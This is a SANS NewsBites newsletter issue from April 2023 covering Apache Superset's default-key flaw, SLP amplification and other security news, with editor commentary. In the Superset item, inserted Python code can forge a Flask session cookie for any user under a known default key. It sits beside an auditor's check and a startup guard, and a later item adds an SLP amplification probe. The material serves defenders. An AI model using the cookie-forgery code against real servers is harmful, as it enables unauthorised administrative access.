SANS NewsBites

Update Apache Superset ASAP; Google Authenticator Still Does Not Support End to End Encryption; Advanced Attackers Are Focusing on Application Update Installers; SANS Panel at RSA: Five Most Dangerous New Attack Techniques

April 28, 2023  |  Volume XXV - Issue #34

Top of the News


2023-04-26

Apache Superset Misconfiguration Allows Remote Code Execution

An insecure default configuration in Apache Superset (CVE-2023-27524) could be exploited to gain administrative access to the data visualization and exploration tool, harvest credentials, compromise data, and execute code remotely. The issue exists in Apache Superset versions up to and including 2.0.1; the fixed release, version 2.1, shipped on April 5, 2023. Users are urged to update to Apache Superset version 2.1 or later.

Editor's Note

[Ullrich] On the one hand, users should read the manual, but on the other hand, software should not assume they actually do. If you add a default cryptographic key (or password) to your software's configuration at least display an error message and do not allow the software to run unless the key is changed.

Johannes Ullrich

Let’s break this down: This was a lab in the Advanced Web Pen Testing Course I authored many years ago. The bug here stems from how cookies are securely wrapped within the application. Since the encryption key is well known, and the attacker understands the algorithm to unwrap the cookie, the encryption is rendered ineffective as it just requires someone to look. These bugs are nasty because it's more than just resetting a user’s password; it has to do with rotating the application secret, which is the crux of this issue. Does this impact more than Apache Superset? Potentially, this bug affected Python Flask (in this case, being the target) and Ruby Sinatra. The advice given to most “developers” is “choose a strong key”; however, most developers that are building Flask applications should have this defaulted to a randomly generated long string. I advise many developers in this setting that “opinionated frameworks” can set safe defaults, while these microservices frameworks may not. This is the risk model you must assume.

Moses Frost

This is the challenge of a functional default configuration. Ideally, security items that you're supposed to provide your own value for should be commented out, with a note about setting a value. Not only does version 2.1 fix the bug, but it also will not start if you're using one of the default keys. If you're using a default key, you will not only need to generate a new secure one, but the information secured with the old one will also need to be re-encrypted. The Apache Superset CLI includes a tool for rotating secrets; see the Superset SECRET_KEY Rotation page. https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation

Lee Neely

Default configuration is a delicate balance between user experience and security. The vendor too often tips the scale to user experience. There exists a marketplace that offers secure configuration recommendations for a variety of vendor products (CIS Benchmarks, DISA STIGs). In this case, the only alternative is to update to the latest version. Here’s a gentle reminder to build secure configuration into your cybersecurity program.

Curtis Dukes
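As an added illustration of the mechanism Moses Frost and Lee Neely describe above (example code added to this issue, not Apache Superset's or Flask's own code): a simplified reimplementation of the signing scheme Flask session cookies use, with an auditor's check that tries a captured cookie against known default keys, the forgery a known key permits, and the startup guard that refuses to run on a default key. The scheme follows itsdangerous (salt "cookie-session", HMAC-based key derivation, SHA-1); real Flask cookies also pass through Flask's tagged JSON serializer and may compress the payload, so byte-for-byte compatibility with a live cookie, the "_user_id" session key, and every candidate key other than Superset's CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET placeholder are assumptions. The actual list of shipped defaults is in the Horizon3 write-up linked in the Tech Corner.

```python
"""Simplified reimplementation of Flask's session-cookie signing
(itsdangerous URLSafeTimedSerializer: salt "cookie-session", HMAC key
derivation, SHA-1). Example code added to this issue; not Superset's or
Flask's code. Cookie layout: <b64 payload>.<b64 timestamp>.<b64 HMAC>.
"""
import base64
import hashlib
import hmac
import json
import time
from typing import Iterable, Optional

SALT = b"cookie-session"  # salt Flask's SecureCookieSessionInterface uses

# Keys to test a captured cookie against. The first is the placeholder
# Superset shipped in its default config; the others are constructed
# stand-ins. The real list of shipped defaults is in the Horizon3 write-up.
KNOWN_DEFAULT_KEYS = [
    b"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",
    b"constructed-default-key-1",
    b"constructed-default-key-2",
]


def _b64(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _unb64(enc: bytes) -> bytes:
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))


def _signature(secret_key: bytes, value: bytes) -> bytes:
    # itsdangerous "hmac" key derivation: signing key = HMAC-SHA1(secret, salt);
    # the cookie value is then authenticated with HMAC-SHA1 under that key.
    derived = hmac.new(secret_key, SALT, hashlib.sha1).digest()
    return _b64(hmac.new(derived, value, hashlib.sha1).digest())


def sign_session(session: dict, secret_key: bytes, timestamp: Optional[int] = None) -> str:
    """Serialise and sign a session dict the way the server does."""
    if timestamp is None:
        timestamp = int(time.time())
    payload = _b64(json.dumps(session, separators=(",", ":"), sort_keys=True).encode())
    ts = _b64(timestamp.to_bytes(max(1, (timestamp.bit_length() + 7) // 8), "big"))
    value = payload + b"." + ts
    return (value + b"." + _signature(secret_key, value)).decode()


def verify_session(cookie: str, secret_key: bytes,
                   max_age: Optional[int] = None, now: Optional[int] = None) -> Optional[dict]:
    """Return the session dict if the signature (and age, if max_age is given) checks out."""
    try:
        payload, ts, sig = cookie.encode().rsplit(b".", 2)
    except ValueError:
        return None
    if not hmac.compare_digest(_signature(secret_key, payload + b"." + ts), sig):
        return None
    if max_age is not None:
        issued = int.from_bytes(_unb64(ts), "big")
        current = now if now is not None else int(time.time())
        if current - issued > max_age:
            return None
    return json.loads(_unb64(payload))


def find_default_key(cookie: str, candidates: Iterable[bytes] = KNOWN_DEFAULT_KEYS) -> Optional[bytes]:
    """Auditor's check: does any published default key validate this cookie?
    A hit means anyone who can reach the instance can mint cookies for it."""
    for key in candidates:
        if verify_session(cookie, key) is not None:
            return key
    return None


def forge_login_cookie(secret_key: bytes, user_id: str) -> str:
    """What a known key permits: a cookie for any user id, no password needed.
    "_user_id"/"_fresh" are the keys Flask-Login stores (assumed, not from the page)."""
    return sign_session({"_user_id": user_id, "_fresh": True}, secret_key)


def check_secret_key(secret_key: bytes, defaults: Iterable[bytes] = KNOWN_DEFAULT_KEYS,
                     min_len: int = 32) -> None:
    """The startup guard the editors ask for: refuse to run on a default or
    short key rather than silently accepting it."""
    if secret_key in list(defaults):
        raise RuntimeError("SECRET_KEY is a published default; generate a new one")
    if len(secret_key) < min_len:
        raise RuntimeError(f"SECRET_KEY is shorter than {min_len} bytes")


if __name__ == "__main__":
    victim = sign_session({"_user_id": "7"}, KNOWN_DEFAULT_KEYS[0])
    print("default key found:", find_default_key(victim))
    forged = forge_login_cookie(KNOWN_DEFAULT_KEYS[0], "1")
    print("forged session accepted:", verify_session(forged, KNOWN_DEFAULT_KEYS[0]) is not None)
```

A hit from find_default_key is the signal that generating a new key is not the whole fix. Per the rotation page Lee Neely links, Superset encrypts stored database credentials under the same SECRET_KEY, so the documented procedure is to set PREVIOUS_SECRET_KEY to the old value, set a new random SECRET_KEY, and run superset re-encrypt-secrets; every existing session should then be treated as compromised, since cookies minted under the old key can no longer be distinguished from legitimate ones.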

2023-04-27

Google Authenticator Revamp Includes Account Synchronization (But No E2EE Yet)

Google Authenticator now lets users sync their sign-in codes to their Google Accounts and other devices. This will prevent users from being locked out of their accounts if a device is lost or stolen. The synced sign-in codes are not protected by end-to-end encryption (E2EE), so anyone who gains access to your Google Account can see all of your 2FA secrets. Google plans to add E2EE to Google Authenticator at some point in the future.


2023-04-27

Malware Delivered Through Legitimate Update Channels

An advanced persistent threat (APT) threat actor with ties to China has been delivering malware to an international non-governmental organization (NGO) via legitimate software update channels. Researchers from ESET “discovered that when performing automated updates, a legitimate application software component downloaded MgBot backdoor installers from legitimate URLs and IP addresses.” The researchers believe the infection was carried out either as a supply chain attack or as an adversary-in-the-middle attack.


2023-04-27

RSA 2023: SANS Briefing on Five Most Dangerous New Attack Techniques

On Wednesday, April 26, SANS instructors and faculty members Katie Nickels, Johannes Ullrich, Stephen Sims, and Heather Mahalik took the stage at an RSA Conference keynote titled The Five Most Dangerous New Attack Techniques. Watch SANS Technology Institute College President Ed Skoudis's preview of the keynote session at the top link below.

The Rest of the Week's News


2023-04-27

Agricultural Equipment Right-to-Repair Becomes Law in Colorado

Colorado Governor Jared Polis has signed into law a bill that gives owners of agricultural equipment the right to repair their own machines. The law will take effect January 1, 2024. Colorado has an existing right-to-repair law that gives powered wheelchair owners the right to repair their devices. Legislatures in ten other US states are considering similar agricultural right-to-repair bills.

Editor's Note

From an overall economic point of view, it makes sense to make sure product manufacturers can’t unfairly profit over needed repairs or upgrades to their products that include software. But, from a security perspective it means instead of one definitive source for updates, there will be many – which of course enables criminals to supply malicious updates/”features” that will turn a tractor into a brick until the ransom is paid. Supply chain security is hard enough; this enlarges the number of potential software suppliers. Security evaluation criteria will have to be in every procurement of third-party software updates and services. See this week’s item on Chinese attacks compromising legitimate software updates.

John Pescatore

I’m of two minds on the ‘Right-to-Repair’ law. Yes, it’s a good thing purely from an economics viewpoint. It is also likely to reduce the monopoly on equipment repair that farm equipment vendors currently enjoy. However, from a security perspective, it opens up a raft of potential localized supply chain attacks by evil-doers. Given that many other states are considering similar bills, security guidance to shore up supply chains becomes increasingly important.

Curtis Dukes

This bill initially applied to powered wheelchairs and was extended to include agricultural equipment. Given the duty cycle of that equipment, and the complexity - more like a jet plane than that tractor on Green Acres, being able to get parts and effect repairs is a 24x7 problem during peak seasons, such as harvest, and making repairs difficult can have a direct impact on consumers due to lost/ruined crops or excessive costs. Farmers will still have the choice to go to the OEM for repair services, and I am sure will run into less-than-ideal third-party options. On the cool side, this legitimizes hacks developed in the field. John Deere is known for incorporating these into future products after discovering them in the field.

Lee Neely

My dad was a mechanic, and I grew up working on cars; it dumbfounds me that someone who purchased a piece of equipment here was treated as a software licensee. Please make no mistake; the automotive business was more about selling parts than it was about selling cars. I can’t imagine working on a car today; like Darth Vader, a car is more computer than mechanical. Unfortunately, the large machine agricultural market is almost a monopoly at this point, and if you are in that business, you are beholden to whom you can purchase a tractor from. Unfortunately, you even have to have a law like this on the books, but this is where we are. Instead of this law, we saw small farms backdooring their machinery, which was less than ideal for repairing their machinery. Let’s hope that the manufacturers allow for fewer restrictions in the future. However, I think that since many of us are moving away from combustion engines into less “maintenance” and “less profitable parts sales” electric vehicles, we may also start to see more and more restrictions on our regular vehicles.

Moses Frost

The IT market clearly prefers open systems. Only a few of us prefer the confidence that comes with closed systems. My iPhone and iPad rarely need repair and when they do I will continue to take them to the Apple Store. Not sure what I might do with a farmer's robot where the difference between the cost of "authorized" repairs and others might be material.

William Hugh Murray

2023-04-26

NIST Taking Comments on Draft Guidance on Post-Quantum Cryptography

The US National Institute of Standards and Technology (NIST) has published a preliminary draft of its Special Publication 1800-38A, Migration to Post-Quantum Cryptography. The guide is intended to help organizations identify where and how public-key algorithms are being used on their systems; provide tools, guidelines, and practices to plan replacements and updates for hardware, software, and services that use quantum-vulnerable public-key algorithms; and develop a playbook for migration. The guide also offers tools for product and service providers. NIST will accept comments on the document through June 8, 2023.


2023-04-27

Google Obtains Takedown Order for CryptBot Malware Operation

Google has obtained a court order that allowed the company to take down infrastructure supporting the CryptBot malware operation. CryptBot has infected an estimated 670,000 computers over the past year and has been used to steal data from Google Chrome users. The order allows Google to take down domains of CryptBot distributors both now and in the future.


2023-04-26

VMware Updates for Workstation and Fusion

VMware has released updates to address four vulnerabilities in their Workstation and Fusion software hypervisors. One of the flaws, a stack-based buffer-overflow vulnerability in Bluetooth device-sharing functionality, is rated critical. The other three – an information disclosure vulnerability in Bluetooth device-sharing functionality, a VMware Fusion Raw Disk local privilege escalation vulnerability, and an out-of-bounds read/write vulnerability – are rated important.


2023-04-26

SLP Vulnerability Can Be Exploited to Launch Reflective Amplification DDoS Attacks

A vulnerability in the Service Location Protocol (SLP), tracked as CVE-2023-29552, could be exploited to amplify distributed denial-of-service (DDoS) attacks by a factor of up to 2,200. SLP “allows an unauthenticated remote attacker to register arbitrary services [and] use spoofed UDP traffic to conduct a denial-of-service (DoS) attack with a significant amplification factor.” SLP is a network discovery protocol developed more than 25 years ago. While it was never intended to be exposed to the public Internet, researchers from Bitsight and Curesec found more than 54,000 instances reachable online. The issue affects all SLP implementations. The researchers’ blog post offers suggested mitigations.
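A way to check hosts you own for the exposure described above (example code added to this issue, not the researchers' code): it builds an SLPv2 service request by the RFC 2608 layout, parses the reply header, and reports bytes returned per byte sent, which is the amplification figure the researchers quote. The default service type and scope used in the request are assumptions, and the probe sends one unicast request to a single host. The mitigation is the one the researchers give: disable SLP on anything reachable from untrusted networks and block UDP and TCP port 427 at the perimeter.

```python
"""SLPv2 service request builder and reply-header parser, to measure what
a host of your own returns on UDP/427. Example code added to this issue,
not Bitsight's or Curesec's. Layout per RFC 2608 sections 8 and 8.1.
"""
import socket
import struct
from typing import List, Tuple

SLP_PORT = 427
SLP_VERSION = 2
SRVRQST, SRVRPLY = 1, 2  # function IDs (RFC 2608 section 8)
HEADER_FIXED = 14        # header bytes before the variable-length language tag


def _lstr(s: bytes) -> bytes:
    """2-byte big-endian length prefix followed by the bytes, as SLP encodes strings."""
    return struct.pack("!H", len(s)) + s


def build_srvrqst(service_type: bytes = b"service:service-agent",
                  scope: bytes = b"DEFAULT", xid: int = 0x1234, lang: bytes = b"en") -> bytes:
    """Unicast SrvRqst: flags 0 (no multicast R flag), empty previous-responder
    list, no predicate, no SPI. The default service type and scope are assumptions."""
    body = (_lstr(b"")            # PRList
            + _lstr(service_type)
            + _lstr(scope)
            + _lstr(b"")          # predicate
            + _lstr(b""))         # SLP SPI
    length = HEADER_FIXED + len(lang) + len(body)
    header = (bytes([SLP_VERSION, SRVRQST])
              + length.to_bytes(3, "big")       # 3-byte total length
              + struct.pack("!H", 0)            # flags
              + (0).to_bytes(3, "big")          # next extension offset
              + struct.pack("!H", xid)
              + _lstr(lang))
    return header + body


def parse_header(pkt: bytes) -> dict:
    """Decode the SLPv2 header; raises ValueError on anything that is not SLPv2."""
    if len(pkt) < HEADER_FIXED:
        raise ValueError("packet shorter than an SLP header")
    version, function = pkt[0], pkt[1]
    if version != SLP_VERSION:
        raise ValueError(f"not SLPv2 (version byte {version})")
    length = int.from_bytes(pkt[2:5], "big")
    flags, = struct.unpack("!H", pkt[5:7])
    xid, = struct.unpack("!H", pkt[10:12])
    lang_len, = struct.unpack("!H", pkt[12:14])
    return {"version": version, "function": function, "length": length,
            "flags": flags, "xid": xid,
            "lang": pkt[HEADER_FIXED:HEADER_FIXED + lang_len].decode("ascii", "replace")}


def amplification_factor(request: bytes, replies: List[bytes]) -> float:
    """Bytes returned per byte sent; the ratio the researchers report as up to 2,200."""
    return sum(len(r) for r in replies) / len(request)


def probe(host: str, timeout: float = 2.0) -> Tuple[bytes, List[bytes]]:
    """Send one unicast SrvRqst to a host you own and collect replies carrying
    our transaction id until the socket times out. Needs a live host."""
    req = build_srvrqst()
    want_xid = parse_header(req)["xid"]
    replies: List[bytes] = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(req, (host, SLP_PORT))
        try:
            while True:
                data, _ = sock.recvfrom(65535)
                try:
                    if parse_header(data)["xid"] == want_xid:
                        replies.append(data)
                except ValueError:
                    continue  # not SLP; ignore
        except socket.timeout:
            pass
    return req, replies


if __name__ == "__main__":
    import sys
    req, replies = probe(sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1")
    print(f"sent {len(req)} bytes, got {len(replies)} replies, "
          f"amplification {amplification_factor(req, replies):.1f}x")
```

Any reply at all from a host that is not meant to serve SLP is a finding; a ratio well above 1 on an Internet-facing address is the condition the researchers describe, and the registrations an attacker adds before the spoofed requests are what push it toward the reported maximum.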


2023-04-26

PrestaShop Update Fixes Critical SQL Filtering Vulnerability

The PrestaShop e-commerce platform has released an update to address a critical vulnerability that allows all backend users to “write, update and delete in the database, even without having specific rights.” The SQL filtering vulnerability is fixed in PrestaShop versions 8.0.4 and 1.7.8.9.


2023-04-26

Cisco Working on Fix for Zero-day in Prime Collaboration Deployment Tool

Cisco has disclosed a zero-day vulnerability in its Prime Collaboration Deployment (PCD) software that could be exploited to execute code remotely or steal sensitive data. Cisco is developing a patch for the vulnerability; there are currently no workarounds.

Internet Storm Center Tech Corner

Strolling Through Cyberspace and Hunting for Phishing Sites

https://isc.sans.edu/diary/Strolling+through+Cyberspace+and+Hunting+for+Phishing+Sites/29780

RSA Panel: Five most dangerous new attack techniques

https://www.rsaconference.com/usa/agenda/session/The%20Five%20Most%20Dangerous%20New%20Attack%20Techniques

SANS.edu Research Journal

https://www.sans.edu/cyber-security-research

Calculating CVSS Scores with ChatGPT

https://isc.sans.edu/diary/Calculating+CVSS+Scores+with+ChatGPT/29774

Google Authenticator Sync Encryption

https://security.googleblog.com/2023/04/google-authenticator-now-supports.html

Ransomware Gang Exploiting Unpatched Veeam Backup Products

https://www.computerweekly.com/news/365535586/Ransomware-gang-exploiting-unpatched-Veeam-backup-products

Keycloak Vulnerability

https://www.reddit.com/r/netsec/comments/130km04/user_impersonation_via_stolen_uuid_code_in/

Amplifying SLP Traffic

https://www.bitsight.com/blog/new-high-severity-vulnerability-cve-2023-29552-discovered-service-location-protocol-slp

Insecure Default Configuration in Apache Superset

https://www.horizon3.ai/cve-2023-27524-insecure-default-configuration-in-apache-superset-leads-to-remote-code-execution/

PoC Exploit for Sophos Web Appliance

https://github.com/W01fh4cker/CVE-2023-1671-POC